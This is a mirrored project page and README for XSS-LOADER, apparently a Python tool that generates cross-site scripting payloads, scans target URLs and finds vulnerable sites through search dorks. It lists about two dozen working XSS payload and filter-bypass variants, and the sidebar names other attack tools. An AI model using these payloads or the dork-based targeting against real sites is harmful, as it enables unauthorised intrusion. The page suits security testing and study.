Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details

All Projects → capture0x → Xss Loader

capture0x / Xss Loader

Licence: cc0-1.0

Xss Payload Generator ~ Xss Scanner ~ Xss Dork Finder

Programming Languages

python

139335 projects - #7 most used programming language

Labels

hacking xss payloads

Projects that are alternatives of or similar to Xss Loader

Payloads

Git All the Payloads! A collection of web attack payloads.

Stars: ✭ 2,862 (+1231.16%)

Mutual labels: hacking, xss, payloads

Reconftw

reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities

Stars: ✭ 974 (+353.02%)

Mutual labels: hacking, xss

Tiny Xss Payloads

A collection of tiny XSS Payloads that can be used in different contexts. https://tinyxss.terjanq.me

Stars: ✭ 975 (+353.49%)

Mutual labels: xss, payloads

Cazador unr

Hacking tools

Stars: ✭ 95 (-55.81%)

Mutual labels: hacking, xss

Sql Injection Payload List

🎯 SQL Injection Payload List

Stars: ✭ 716 (+233.02%)

Mutual labels: hacking, payloads

Resources For Beginner Bug Bounty Hunters

A list of resources for those interested in getting started in bug bounties

Stars: ✭ 7,185 (+3241.86%)

Mutual labels: hacking, xss

Givingstorm

Infection vector that bypasses AV, IDS, and IPS. (For now...)

Stars: ✭ 72 (-66.51%)

Mutual labels: hacking, payloads

Xxe Injection Payload List

🎯 XML External Entity (XXE) Injection Payload List

Stars: ✭ 304 (+41.4%)

Mutual labels: hacking, payloads

Collection Document

Collection of quality safety articles. Awesome articles.

Stars: ✭ 1,387 (+545.12%)

Mutual labels: hacking, xss

Phpvuln

Audit tool to find common vulnerabilities in PHP source code

Stars: ✭ 146 (-32.09%)

Mutual labels: hacking, xss

Xss Payload List

🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List

Stars: ✭ 2,617 (+1117.21%)

Mutual labels: xss, payloads

Xspear

Powerfull XSS Scanning and Parameter analysis tool&gem

Stars: ✭ 583 (+171.16%)

Mutual labels: hacking, xss

Payloadsallthethings

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

Stars: ✭ 32,909 (+15206.51%)

Mutual labels: hacking, payloads

V3n0m Scanner

Popular Pentesting scanner in Python3.6 for SQLi/XSS/LFI/RFI and other Vulns

Stars: ✭ 847 (+293.95%)

Mutual labels: hacking, xss

0d1n

Tool for automating customized attacks against web applications. Fully made in C language with pthreads, it has fast performance.

Stars: ✭ 506 (+135.35%)

Mutual labels: hacking, xss

Pythem

pentest framework

Stars: ✭ 1,060 (+393.02%)

Mutual labels: hacking, xss

Jsshell

JSshell - JavaScript reverse/remote shell

Stars: ✭ 167 (-22.33%)

Mutual labels: hacking, xss

XSS-Payload-without-Anything

XSS Payload without Anything.

Stars: ✭ 74 (-65.58%)

Mutual labels: xss, payloads

Arachni

Web Application Security Scanner Framework

Stars: ✭ 2,942 (+1268.37%)

Mutual labels: hacking, xss

Hackvault

A container repository for my public web hacks!

Stars: ✭ 1,364 (+534.42%)

Mutual labels: xss, payloads

View All Similar Projects ➔

💎 XSS-LOADER TOOLS 💎

Written by TMRSWRR

Version 1.0.0

All in one tools for XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER

Instagram: TMRSWRR

📷 Screenshots 📷

👇 💌 How to use 💌 👇

📒 Read Me 📒

This tool creates payload for use in xss injection
Select default payload tags from parameter or write your payload
It makes xss inj. with Xss Scanner parameter
It finds vulnerable sites url with Xss Dork Finder parameter

💿 Installation 💿

Installation with requirements.txt

git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

Usage

python3 payloader.py

🗃️ Features 🗃️

*Basic Payload

Sets default parameter to :<script>alert(1)</script>

*Div Payload

Sets default parameter to :<div onpointerover='alert(1)'>MOVE HERE</div

*Img Payload

Sets default parameter to :<img src=x onerror=alert('1');>

*Body Payload

Sets default parameter to :<body ontouchstart=alert(1)>

*Svg Payload

Sets default parameter to :<svg onload=alert('1')>

*Enter Your Payload

Encodes payload writed by user

*Payload Generator Parameter

Encodes payload on selected tag

* |   1.  UPPER CASE---->  <SCRIPT>ALERT(1)</SCRIPT>              
* |   2.  UPPER AND LOWER CASE----> <ScRiPt>aleRt(1)</ScRiPt>   
* |   3.  URL ENCODE ----->   %3Cscript%3Ealert%281%29%3C%2Fscript%3E           
* |   4.  HTML ENTITY ENCODE----->  &lt;script&gt;alert(1)&lt;/script&gt; 
* |   5.  SPLIT PAYLOAD ----->  <scri</script>pt>>alert(1)</scri</script>pt>>       
* |   6.  HEX ENCODE ----->  3c7363726970743e616c6572742831293c2f7363726970743e       
* |   7.  UTF-16 ENCODE -----> Encode payload to utf-16 format.   
* |   8.  UTF-32 ENCODE----->  Encode payload to utf-32 format.          
* |   9.  DELETE TAG -----> ";alert('XSS');//            
* |  10.  UNICODE ENCODE----->    %uff1cscript%uff1ealert(1)%uff1c/script%uff1e         
* |  11.  US-ASCII ENCODE ----->  ¼script¾alert(1)¼/script¾      
* |  12.  BASE64 ENCODE ----->   PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==          
* |  13.  UTF-7 ENCODE ----->   +ADw-script+AD4-alert(1)+ADw-/script+AD4-           
* |  14.  PARENTHESIS BYPASS ----->  <script>alert`1`</script>   
* |  15.  UTF-8 ENCODE ----->  %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE          
* |  16.  TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* |  17.  SCRIPT BREAKOUT----->  </script><script>alert(1)</script>
* |  18.  FILE UPLOAD PAYLOAD-----> "><script>alert(1)</script>.gif
* |  19.  INSIDE COMMENTS BYPASS-----> <!--><script>alert(1)</script>-->
* |  20.  MUTATION PAYLOAD-----> <noscript><p title="</noscript><script>alert(1)</script>">
* |  21.  MALFORMED IMG-----> <IMG """><script>alert(1)</script>">
* |  22.  SPACE BYPASS-----> <img^Lsrc=x^Lonerror=alert('1');>
* |  23.  DOWNLEVEL-HIDDEN BLOCK-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* |  24.  WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* |  25.  CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload List
* |  26.  POLYGLOT PAYLOADS-----> Show Polyglot Bypass Payload List
* |  27.  ALERT PAYLOADS-----> Show Alert Payload List
* |  28.  ALL CREATE PAYLOAD-----> Show Create All Payloads
* |  29.  GO BACK MAIN MENU
* |  30.  EXIT

*Xss Scanner

Initially you'll need to enter url of target Please enter the url like this example==>e.g target -----> http://target.com/index.php?name= Selected for scanning payload list

BASIC PAYLOAD LIST ==> Payload list consisting of script tag
DIV PAYLOAD LIST ==> Payload list consisting of div tag
IMG PAYLOAD LIST ==> Payload list consisting of img tag
BODY PAYLOAD LIST ==> Payload list consisting of body tag
SVG PAYLOAD LIST ==> Payload list consisting of svg tag
MIXED PAYLOAD LIST ==> Payload list consisting of all tag
ENTER FILE PATH ==> Payload list determined by the user ,Please enter the url like this example..! (e.g. path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

Results will be added in "vulnpayload.txt" after scanning.

*Xss Dork Finder

First enter the dork for searching: e.g---->inurl:"search.php?q=" Results will be saved in "dork.txt" after scanning.

Known Issues

Fixed:

Unicode errors
Module errors

Important:

If you want to use tool for python3 installed on Windows download below link:

https://github.com/capture0x/XSS-LOADER-for-WINDOWS

Bugs and enhancements

For bug reports or enhancements, please open an issue here.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].

Stars: ✭ 215

Visit Git Page 🔗Visit User Page 🔗Visit Issues Page (4) 🔗